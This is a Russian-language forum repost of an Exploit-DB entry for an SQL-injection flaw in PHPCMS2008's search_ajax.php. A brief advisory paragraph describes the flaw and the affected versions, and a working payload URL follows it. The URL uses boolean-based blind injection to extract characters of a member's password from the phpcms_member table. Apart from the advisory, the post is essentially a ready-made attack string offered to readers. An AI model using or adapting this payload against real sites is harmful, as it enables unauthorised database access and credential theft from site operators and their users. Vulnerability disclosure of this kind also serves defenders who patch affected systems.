Exploit phpCMS 2008 - 'search_ajax.php' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32873
Проверка EDB
  1. Пройдено
Автор
ANONYMOUS
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2009-03-17
Код:
source: https://www.securityfocus.com/bid/34225/info

PHPCMS2008 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Versions prior to PHPCMS2008 2009.03.17 are vulnerable. 

http://www.example.com/ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
 
Источник
www.exploit-db.com

Похожие темы